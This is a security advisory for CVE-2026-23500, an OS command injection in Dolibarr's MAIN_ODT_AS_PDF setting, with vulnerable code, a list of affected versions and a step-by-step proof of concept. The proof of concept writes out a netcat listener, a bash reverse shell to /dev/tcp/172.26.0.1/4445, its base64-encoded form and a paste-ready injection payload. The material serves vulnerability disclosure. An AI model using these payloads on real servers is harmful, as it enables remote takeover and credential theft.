GHSA-w5j3-8fcr-h87w

Suggest an improvement
Source
https://github.com/advisories/GHSA-w5j3-8fcr-h87w
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-w5j3-8fcr-h87w/GHSA-w5j3-8fcr-h87w.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-w5j3-8fcr-h87w
Aliases
  • CVE-2026-23500
Published
2026-04-17T21:24:48Z
Modified
2026-05-06T22:34:23.886965Z
Severity
  • 9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
  • 9.4 (Critical) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H CVSS Calculator
Summary
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
Details

Summary

An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the MAIN_ODT_AS_PDF configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the exec() function in the ODT to PDF conversion process.

Details

The vulnerability is located in htdocs/includes/odtphp/odf.php. When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the MAIN_ODT_AS_PDF global setting.

Code snippet (htdocs/includes/odtphp/odf.php, approx line 930):

$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);

While the filename $name is sanitized using escapeshellcmd(), the configuration variable MAIN_ODT_AS_PDF is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like ;) followed by arbitrary commands.

PoC

Prerequisites: 1. Login as an Administrator. 2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup.

Steps to reproduce (Reverse Shell):

  1. Start a netcat listener on the attacker's machine (IP: 172.26.0.1, Port: 4445):

    nc -lvnp 4445

  2. Prepare the payload. To avoid issues with special characters (like & or >) being escaped by the web application or shell, encode the reverse shell command in Base64:

    # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
# Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK

  3. Navigate to Home -> Setup -> Other Setup.

  4. Add or modify the constant MAIN_ODT_AS_PDF with the following injection payload:

    jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash

    (Explanation: jodconverter satisfies the initial check, ; acts as a command separator, and the pipeline decodes and executes the Base64 payload). <img width="1898" height="696" alt="image" src="https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316" />

  5. Navigate to Commerce -> New proposal, create a draft, select an ODT template (e.g., generic_proposal_odt), and click Generate. <img width="1907" height="668" alt="image" src="https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242" /> <img width="1858" height="346" alt="image" src="https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7" /> <img width="848" height="183" alt="image" src="https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1" />

  6. Check the netcat listener. A connection will be established, granting a shell on the server:

<img width="616" height="193" alt="image" src="https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37" />

Impact

Remote Code Execution (RCE). An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically www-data). This allows for: - Reading sensitive configuration files (database credentials). - Modifying application code. - Full system compromise depending on server configuration (e.g., docker escape, pivoting).

Credits

Reported by Ɓukasz Rybak

Database specific 
{
    "cwe_ids": [
        "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-17T21:24:48Z",
    "nvd_published_at": "2026-04-17T21:16:31Z",
    "severity": "CRITICAL"
}
References

Affected packages

Packagist / dolibarr/dolibarr

Package

Name
dolibarr/dolibarr
Purl
pkg:composer/dolibarr/dolibarr

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
22.0.4

Affected versions

3.*
3.6.0-beta
3.6.0
3.6.1
3.6.2
3.6.3
3.6.4
3.6.5
3.6.6
3.7.0
3.7.1
3.7.2
3.7.3
3.7.4
3.8.0-beta
3.8.0
3.8.1
3.8.2
3.8.3
3.8.4
3.9.0-rc
3.9.0-rc2
3.9.0
3.9.1
3.9.2
3.9.3
3.9.4
4.*
4.0.0-beta
4.0.0-rc
4.0.0-rc2
4.0.0
4.0.1
4.0.2
4.0.3
4.0.4
4.0.5
4.0.6
5.*
5.0.0-beta
5.0.0-rc1
5.0.0-rc2
5.0.0
5.0.1
5.0.2
5.0.3
5.0.4
5.0.5
5.0.6
5.0.7
6.*
6.0.0-beta
6.0.0-rc
6.0.0
6.0.1
6.0.2
6.0.3
6.0.4
6.0.5
6.0.6
6.0.7
6.0.8
7.*
7.0.0
7.0.1
7.0.2
7.0.3
7.0.4
7.0.5
8.*
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.0.5
8.0.6
9.*
9.0.0
9.0.1
9.0.2
9.0.3
9.0.4
10.*
10.0.0
10.0.1
10.0.2
10.0.3
10.0.4
10.0.5
10.0.6
10.0.7
11.*
11.0.0
11.0.1
11.0.2
11.0.3
11.0.4
11.0.5
12.*
12.0.0
12.0.1
12.0.2
12.0.3
12.0.4
12.0.5
13.*
13.0.0
13.0.1
13.0.2
13.0.3
13.0.4
13.0.5
14.*
14.0.0
14.0.1
14.0.2
14.0.3
14.0.4
14.0.5
15.*
15.0.0
15.0.1
15.0.2
15.0.3

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-w5j3-8fcr-h87w/GHSA-w5j3-8fcr-h87w.json"